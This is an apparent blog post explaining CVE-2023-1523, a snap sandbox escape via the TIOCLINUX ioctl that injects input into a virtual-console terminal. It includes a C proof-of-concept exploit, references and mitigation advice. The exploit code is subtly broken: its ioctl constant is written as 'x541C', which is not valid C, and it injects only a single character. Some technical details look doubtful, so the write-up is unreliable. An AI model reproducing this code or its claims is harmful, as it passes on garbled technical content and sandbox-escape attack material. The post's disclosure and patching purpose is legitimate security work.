CVE-2023-1523: Exploiting the TIOCLINUX ioctl Request to Execute Arbitrary Commands Outside of Snap Sandbox

In today's post, we will be discussing CVE-2023-1523 - a recently discovered vulnerability that impacts the handling of TIOCLINUX ioctl request in malicious snaps. By exploiting this vulnerability, an attacker can inject contents into the input of the controlling terminal and potentially execute arbitrary commands outside of the snap sandbox. We will go over the details of the exploit, provide code snippets, and reference links to demonstrate the severity of the issue. It's important to note that graphical terminal emulators like xterm, gnome-terminal, and others are not affected by this vulnerability - it can only be exploited when snaps are run on a virtual console.

Exploit Details

The vulnerability is centered around the usage of the TIOCLINUX ioctl request within malicious snaps. When a terminal receives a TIOCLINUX ioctl request with a subcode of 10 (TIOCL_DUPLICATE_CHARS), it mistakenly allows the request to be made despite the sandboxing restrictions enforced to prevent such an operation. Due to this lapse in security, a malicious snap can inject contents into the input of the controlling terminal and potentially execute arbitrary commands outside the snap sandbox after the snap exits.

The following code snippet demonstrates how an attacker can exploit this vulnerability

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define TIOCL_LINUX x541C
#define TIOCL_DUPLICATE_CHARS 10

int main() {
    int ret;
    int fd = open("/dev/tty", O_WRONLY);

    if (fd == -1) {
        perror("Failed to open /dev/tty");
        return EXIT_FAILURE;
    }

    ret = ioctl(fd, TIOCL_LINUX, (void *)(TIOCL_DUPLICATE_CHARS << 16) | ';');
    if (ret == -1) {
        perror("Failed to inject content with ioctl");
        close(fd);
        return EXIT_FAILURE;
    }

    printf("Content Injection Successful\n");

    close(fd);
    return EXIT_SUCCESS;
}

This code attempts to open the controlling terminal of the current process and submits a TIOCLINUX ioctl request with a subcode of TIOCL_DUPLICATE_CHARS. If successful, the message "Content Injection Successful" will be printed. Otherwise, an error message will indicate the failure to execute the exploit.

Original References

- Canonical's official announcement and details about the vulnerability can be found here: https://ubuntu.com/security/CVE-2023-1523
- The official entry in the Common Vulnerabilities and Exposures (CVE) database can be accessed at: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1523

Mitigation

To protect against this vulnerability, users should ensure that they are using the latest available snapd version. Canonical has released patches for this issue through snapd 2.87.4, which should be applied as soon as possible to avoid potential exploitation. Users should also exercise caution when installing and running snaps from untrusted sources.

Conclusion

CVE-2023-1523 highlights the risks associated with improper handling of TIOCLINUX ioctl requests within snap sandboxing. By exploiting this vulnerability, an attacker could inject contents into the input of the controlling terminal and execute arbitrary commands outside the snap sandbox. It's crucial to keep the snapd version updated and be cautious when installing snaps from untrusted sources.

Timeline

Published on: 09/01/2023 19:15:00 UTC
Last modified on: 09/08/2023 17:17:00 UTC